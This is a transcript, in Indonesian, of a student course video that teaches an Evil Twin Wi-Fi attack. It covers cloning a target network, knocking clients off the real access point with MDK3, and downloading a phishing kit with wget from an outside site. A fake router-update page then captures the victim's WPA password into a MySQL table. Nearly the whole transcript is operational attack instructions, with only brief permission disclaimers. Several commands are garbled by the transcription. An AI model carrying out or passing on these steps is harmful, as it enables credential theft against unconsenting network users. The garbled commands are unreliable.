Assalamualaikum warahmatullahi wabarakatuh. Selamat pagi, siang, sore, dan malam dimanapun kalian berada. Pertama-tama izinkan saya memperkenalkan kelompok kami dahulu. Oke, perkenalkan kami dari kelompok bab 28 dengan tema Evil Twin The Authentication with MDK3. Oke. Selanjutnya tujuan kami membuat video ini agar memenuhi ulangan akhir semester untuk mata kuliah keamanan sistem. Oke. Nah, di dalam video ini saya akan mengajari Anda cara membuat titik akses Evil Twin di virtual machine Kali Linux. Nah, selain itu, saya akan menunjukkan kepada Anda cara menggunakan titik akses Evil Twin yang dikombinasikan dengan beberapa teknik rekayasa sosial untuk mendapatkan kata sandi WPA atau WPA2 target atau password ya teman-teman. Nah, untuk menyelesaikan serangan ini Anda membutuhkan adaptor jaringan USB yang mendukung mode monitor. Nah, oke. Pertama, kita akan membuat titik akses Evil Twin, dan disebut Evil Twin itu karena merupakan tiruan dari titik akses asli. Jadi saya menemukan jaringan nirkabel yang ingin saya targetkan. Saya menyalin informasi pengidentifikasi jaringan tersebut seperti nama dan alamat MAC-nya. Dan kemudian saya menggunakan informasi tersebut untuk membuat jaringan nirkabel saya sendiri. Nah, perlu digarisbawahi, ini hanya boleh dilakukan pada jaringan nirkabel yang Anda miliki sendiri. Nah, jika Anda tidak memiliki jaringan nirkabel, saya sarankan Anda meminta atau bertanya ya kepada tetangga atau teman Anda apakah dapat menggunakan jaringan mereka untuk berlatih menyerang. Nah, ketika kalian terhubung ke jaringan Evil Twin, mereka tidak akan dapat membedakan antara jaringan asli dan jaringan Evil Twin. Nah, kemudian saat kalian membuka browser webnya, saya akan mengarahkan mereka ke halaman pembaruan keamanan untuk router yang akan meminta mereka masukkan kata sandi WPA atau WPA2. Nah, ketika kalian memasukkan kata sandi tersebut akan disimpan dalam database SQL saya yang akan kita buat dalam beberapa saat. Nah, itu saja yang akan saya lakukan untuk serangan ini. Nah, mari saja kita mulai. Pertama-tama kita perlu terhubung ke internet, dan kita akan melakukannya dengan berbagi koneksi internet sistem operasi host kita dengan virtual machine Kali Linux. Nah, dengan cara ini kebutuhan akan adaptor jaringan USB kedua akan hilang. Jika Anda beralih ke sistem operasi host Anda, apapun jenis sistem operasi yang Anda gunakan, asalkan Anda terhubung ke internet, silakan buka manajer jaringan yang Anda punya. Lalu ini yang saya punya itu ya Hexpot. Nah, selanjutnya setelah kita hubungkan dengan WiFi atau internet, kita kembali ke Kali Linux, dan di menu atas kita perlu membuka menu virtual machine, dan kemudian kita akan buka di network adapter, lalu bridge atau dalam kurung auto detect. Nah, di sini fungsinya untuk menjembatani mendeteksi jaringan dari host yang kita punya ke di Kali Linux-nya ya teman-teman. Nah, setelah itu kita wire network, dan kemudian kita klik connect. Nah, lalu setelah itu sudah terkonek nih teman-teman. Nah, saat sudah terkonek, kita langsung saja buka terminal teman-teman. Nah, di dalam terminal ini kita akan menetapkan alamat IP kepada siapa saja yang terhubung ke jalur akses Evil Twin. Nah, selanjutnya kita buka terminal dan kita mengetik apt get install server DHCP3, dan kemudian tekan enter. Nah, saya sudah menginstal server DHCP, tetapi Anda mungkin menerima konfirmasi yang meminta Anda untuk mengkonfirmasi instalasi. Jadi ketik saja Y yang berarti ya, lalu tekan enter dan tunggu beberapa saat untuk menyelesaikan instalasi dari DHCP
3 servernya ya. Selanjutnya kita perlu mengkonfirmasi server DHCP kita. Jadi di terminal kemarin kita ketik nano spasi /etc/dhcpd.conf. Nah, lalu kita kemudian kita tekan enter dan lihat di sini, ini adalah file konfigurasi DHCP30 dan Anda itu harus memiliki yang kosong seperti ini. Namun jika tidak kosong, cukup hapus saja isi yang ada di sini untuk melanjutkan. Nah, setelah Anda siap, mari mulai memasukkan konfigurasi kita. Pada baris pertama kita perlu mengetik autoritatif titik koma, jangan lupa ya teman-teman. Lalu ada default strip list strip time spasi 600. Lalu kita enter, lalu max strip list strip time spasi 7200. Lalu kita ketik subnet spasi 192.168.1.128 spasi netmask spasi 255.255.255.128 spasi tanda kurung kurawal yang menghadap ke depan. Lalu kita ketik option spasi subnet strip mask spasi 255.255.255.128. Nah, selanjutnya kita ketik option spasi broadcast strip address spasi 192.168.1.255. Lalu kita ketik option spasi routers spasi 192.168.1.129. Nah, selanjutnya kita ketik option spasi domain strip name strip server spasi 8.8.8.8. Nah, selanjutnya kita ketik range spasi 192.168.1.130 spasi 192.168.1.140. Selanjutnya kita ketikkan tanda kurung kurawal yang menghadap ke belakang. Nah, teman-teman jangan kita lupakan untuk menambahkan titik koma setiap yang kita ketik. Oke, selanjutnya kita tutup dan simpan. Namun sebelumnya periksa kembali apakah Anda memiliki konfigurasi berikut di terminal Anda. Nah, selanjutnya setelah Anda verifikasi bahwa konfigurasi Anda sudah benar, mari lanjutkan dan simpan konfigurasi ini. Pertama kita akan menekan tombol Ctrl X, lalu kita menekan tombol Y, dan terakhir kita akan menekan tombol Enter. Sekarang kita perlu, kita kembali lagi di terminal tadi. Oke, selanjutnya kita ketik cd spasi /var/www. Lalu kita sudah masuk ke direktorinya dan kita ketik rm spasi index.html. Lalu kita enter saja. Lalu kita ketik wget spasi http://hackdisktv.com/eviltwin.zip. Oke, kita enter saja dan kita mendownload eviltwin-nya ya teman-teman. Nah, setelah Anda mengunduh file zip eviltwin, Anda juga perlu mengekstraknya. Nah, untuk mengekstraknya kita akan ketik unzip spasi eviltwin.zip. Nah, di sini kita lihat nah, oke. Selanjutnya kita ketik rm spasi eviltwin.zip. Oke. Enter, lalu kita ketik clear untuk membersihkan terminal kita. Nah, oke, setelah sudah di clear, kita mengetik /etc/init.d/apc2 spasi star. Oke, kita enter, lalu tekan enter dan sekarang kita perlu memulai MySQL. Jadi mari kita ketik etc/init.d/mysql spasi star. Oke, di sini kita sudah bisa memulai MySQL jadi teman-teman. Oke,
Lalu berikutnya kita ketik MySQL spasi strip u strip root, maksud saya spasi root. Oke, jadi MySQL kita ini sudah berjalan teman-teman. Lalu kita ketik create spasi database spasi evil_twin titik koma. Oke, jadi database evil_twin kita sudah buat. Lalu kita ketik lagi use evil_twin untuk menggunakan database dari evil_twin. Nah, database change. Oke, selanjutnya kita ketik create table wpa underscore keys dalam kurung password spasi varchar dalam kurung 64, confirm spasi varchar dalam kurung 64 dan jangan lupa titik koma teman-teman untuk membuat table wpa keysnya. Oke, sudah terbuat tabelnya. Nah, lalu dan jika Anda bertanya-tanya perintah itu membuat tabel mono WPA keys yang berisi 2 kolom yang disebut kata sandi dan yang lainnya disebut konfirmasi. Angka 64 mewakili jumlah maksimum karakter yang dapat disimpan di dalam kolom, dan saya menggunakan 4 karena kata sandi WPA dapat berisi hingga 64 karakter. Selanjutnya kita perlu menemukan nama antarmuka adaptor jaringan virtual dan perlu menemukan alamat IP lokal. Karena kita akan menggunakan dalam perintah selanjutnya, jadi mari kita buka terminal baru dan biarkan terminal MySQL yang tadi kita buat terbuka karena kita akan mengaksesnya nanti. Di terminal baru kita perlu mengetik IP spasi root. Nah, dan di sini kita bisa melihat interface saya yaitu ETH0 dan alamat IP saya yaitu 192.168.0.6. Nah, tapi mungkin di tiap komputer itu beda-beda ya teman-teman. Nah, kita buka Notepad untuk mengcopy paste word interface yaitu yang tadi sudah kita lihat. Punya saya itu ETH0 dan kita buat lagi local IP. Punya saya itu yang bisa kalian lihat di layar ya teman-teman. Oke, selanjutnya kita kembali ke terminal, lalu kita ketik airmon strip ng. Nah, kita bisa melihat interface-nya yaitu WLAN 0 teman-teman. Nah, kita catat lagi wireless interface-nya itu WLAN 0. Lalu kita ketik lagi, kembali ke terminal, lalu saya ketik airmon strip ng spasi stars. Nah, kita perlu lihat wireless interface yang tadi, yang punya saya itu WLAN 0. Oke, selanjutnya bisa kita lihat mode monitor saya yaitu mon 0 teman-teman. Oke, kita catat lagi monitor interface saya itu mon 0. Oke, dan sekarang kita akan menggunakan kita clear terlebih dahulu untuk mengosongkan terminal teman-teman. Oke, selanjutnya kita ketik aerodum strip ng strip ow strip update. Nah, selanjutnya kita ketik aerodrum strip ng spasi strip m. Nah, spasi monitor interface yang tadi kita lihat. Nah, punya saya itu mon 0. Oke, selanjutnya kita bisa lihat ada SSID dan BSSID gitu teman-teman. NC-nya juga bisa kita lihat ada yang open WPA dan WPA2, ada yang menggunakan password dan tidak. Nah, kita bisa catat kembali di Notepad yaitu target SSID, target CH, target channel, dan target BSSID. Nah, kita ketik punya saya itu Hackdroid dan target channelnya itu 6. Dan target BSSID-nya kita bisa lihat situ, kita copy lalu kita pastekan saja di Notepad ya teman-teman. Lalu kita kembali lagi ke terminal, lalu kita clear untuk membersihkan layar terminal. Lalu kita ketik airbase strip ng spasi strip e SSID yang kita punya, strip c, lalu spasi channel kita saya punya 6 dan spasi min p strip p spasi monitor interface punya saya mon 0. Nah, lalu kita buka terminal baru
dan kita ketik ifconfig at 0 spasi 192.168.1.129 spasi netmask spasi 255.255.255.128. Oke, kita enter, lalu kita ketik lagi root spasi add spasi stripnet spasi 192.168.1.118 spasi netmask spasi 255.255.255.128 spasi gw spasi 192.168.1.129. Kita enter lagi, lalu kita ketik echo spasi 1 spasi lebih besar, tanda lebih besar ya, spasi /proc /sys /net /ipv4 /IP_forward. Lalu kita enter, lalu kita ketik yang bisa kalian lihat teman-teman di layar monitor. Kita enter lagi dan kalian bisa lihat lagi di layar monitor. Kita enter dan kita bisa lihat lagi di layar monitor. Jangan lupa punya setiap komputer itu berbeda-beda ya teman-teman, jadi jangan samakan di yang ditampilkan. Oke, kita enter saja, kita lihat lo sudah di sini. Kita masukkan ketik /etc/init.d/is strip dhcp strip server spasi start. Lalu setting ESC dhcp server sudah oke. Lalu kita ke echo basis ID kalian yang tadi kita lihat, kita copy saja, kita pastekan dan tanda lebih besar, lalu blacklist. Lalu MDK3 monitor yang bisa kalian lihat di layar. Nah, setelah itu kita akan lihat ke komputer host kalian dan kita lihat di network atau wifi atau LAN yang kalian punya. Tapi ini lebih tepatnya ke wifi sih teman-teman, nggak ke kabel LAN. Kita lihat hack droid set, kita lihat kita masih nyambung dan tidak ada sinyal atau tidak ada jaringan. Nah, kita kembali lagi ke Kali Linux, lalu kita lihat dan sudah mulai akses point dengan Evil Twin. Nah, di on enkripsi. Lalu kita lihat ke host lagi dan kita lihat sudah ada lagi network kita, dan kita coba cek di Mozilla Firefox dan kita ketik google.com. Nah, kita ke Linksys by Cisco. Kita lihat di sini untuk keamanan kalian. Nah, di sini nih udah keserang teman-teman dari PC, dari wifi yang teman-teman gunakan yang diserang oleh Evil Twin ini dari Kali Linux. Ya, kita masukkan WPA atau WPA2 key-nya dan confirm atau password wifi-nya, kita confirm. Nah, terima kasih. Nah, kita nunggu untuk update finish, lalu kita kembali ke Kali Linux dan di terminal kita cek, kita gunakan Evil Twin atau use Evil Twin. Nah, database sudah terganti dan kita select semua WPA keys dari si Evil Twin. Nah, kita lihat passwordnya yang tadi kita masukkan Gravitrain 123 dan confirmnya Gravitrain 123. Nah, kalian lihat disinilah password yang kita dapatkan, password dari yang kita serang gitu teman-teman, Gravitrain 123. Nah, oke. Begitulah cara Anda membuat titik akses kembali Evil Twin dan mengatur halaman web yang akan menangkap kata sandi Anda gitu. Jadi harap pastikan Anda memiliki izin tertulis sebelum menggunakan alat ini karena dapat menyebabkan kerusakan serius pada semua perangkat jaringan yang terhubung ke jaringan. Jika Anda hanya berlatih di laboratorium rumah, laboratorium kuli kampus atau rumah di lingkungan yang tidak macam-macam, hal ini tidak akan menimbulkan masalah bagi siapapun. Tetap saya sarankan Anda mematikan router Anda dan berlatih dengan hati-hati tanpa koneksi ke internet. Oke, cukup sekian dari kelompok kami. Mohon maaf jika kami memiliki kekurangan. Terima kasih telah mendengarkan paparan saya.
dari awal hingga akhir. Oke. Kelompok bab 26 Evil Twin The Authentication Attack with MDK3. Mohon pamit undur diri. Wassalamualaikum warahmatullahi wabarakatuh.